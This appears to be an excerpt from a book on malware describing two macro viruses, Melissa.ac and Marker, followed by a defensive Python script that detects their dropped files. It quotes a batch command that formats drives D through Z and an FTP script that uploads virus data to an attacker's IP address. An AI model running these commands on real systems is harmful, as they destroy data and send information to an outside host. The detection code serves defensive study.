Macro Virus Examples

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

W97M.Melissa.ac

This Melissa variant attempts to format local hard drives, corrupts CMOS memory, and uses email clients to forward itself. It drops a batch file, called DRIVES.BAT, that contains the following commands to format hard drives:

echo y|format/q d: /v:Empty>NUL

This command is repeated for drives D through Z.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM. This executable attempts to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not cause permanent damage to your CMOS.

W97M.Marker

Marker is a Word macro virus that keeps track of whom it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS. The .SYS file contains the virus code, and the .VXD file is a script file used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4, to which I have added comments:

Example 5-4. Marker virus FTP script file

o 209.201.88.110      ;opens an ftp connection to hacker's ftp site
user anonymous        ;logs user in as anonymous
pass itsme@           ;puts in password
cd incoming           ;changes to subdirectory called incoming on hacker's site
ascii                 ;puts file transfer in ascii text transmission mode
put hsfedrt.sys ...
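As an added defensive example (not code from the book), here is a small Python triage helper that flags the two dropped-file patterns described above: a batch file that formats drives D through Z unattended, and an FTP command script that logs in anonymously and uploads a file. The regexes, function names and sample artifacts are constructed for this example; the IP address in the sample is a documentation placeholder, not the site named in the book.

```python
import re
from typing import Dict, List

# Matches one unattended format line per drive, e.g. "echo y|format/q d: /v:Empty>NUL"
FORMAT_RE = re.compile(r"echo\s+y\s*\|\s*format(?:\s*/\S+)*\s*([a-z]):", re.IGNORECASE)
# FTP.EXE script verbs that together describe an anonymous upload
FTP_OPEN_RE = re.compile(r"^\s*(o|open)\s+(\d{1,3}(?:\.\d{1,3}){3})", re.IGNORECASE)
FTP_ANON_RE = re.compile(r"^\s*user\s+anonymous\b", re.IGNORECASE)
FTP_PUT_RE = re.compile(r"^\s*put\s+(\S+)", re.IGNORECASE)

def find_format_drives(text: str) -> List[str]:
    """Return the drive letters a batch file tries to format with a piped 'y' answer."""
    return [m.group(1).upper() for line in text.splitlines()
            if (m := FORMAT_RE.search(line))]

def parse_ftp_script(text: str) -> Dict[str, object]:
    """Summarise an FTP command script: target host, anonymous login, uploaded files."""
    info: Dict[str, object] = {"host": None, "anonymous": False, "uploads": []}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop trailing ';' comments
        if not line:
            continue
        if m := FTP_OPEN_RE.match(line):
            info["host"] = m.group(2)
        elif FTP_ANON_RE.match(line):
            info["anonymous"] = True
        elif m := FTP_PUT_RE.match(line):
            info["uploads"].append(m.group(1))
    return info

def assess(text: str) -> List[str]:
    """Return human-readable findings for a dropped text artifact (empty list if benign)."""
    findings = []
    drives = find_format_drives(text)
    if drives:
        findings.append(f"unattended format of drives {drives[0]}-{drives[-1]} ({len(drives)} lines)")
    ftp = parse_ftp_script(text)
    if ftp["host"] and ftp["uploads"]:
        who = "anonymous " if ftp["anonymous"] else ""
        findings.append(f"{who}FTP upload of {', '.join(ftp['uploads'])} to {ftp['host']}")
    return findings

# Constructed samples modelled on the artifacts described above (not the real files)
SAMPLE_DRIVES_BAT = "\n".join(f"echo y|format/q {d}: /v:Empty>NUL" for d in "defghijklmnopqrstuvwxyz")
SAMPLE_FTP_SCRIPT = "o 192.0.2.10 ;placeholder address\nuser anonymous\npass itsme@\ncd incoming\nascii\nput hsfedrt.sys\nbye\n"

if __name__ == "__main__":
    for name, sample in (("DRIVES.BAT", SAMPLE_DRIVES_BAT), ("NETLDX.VXD", SAMPLE_FTP_SCRIPT)):
        print(name, assess(sample))
```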
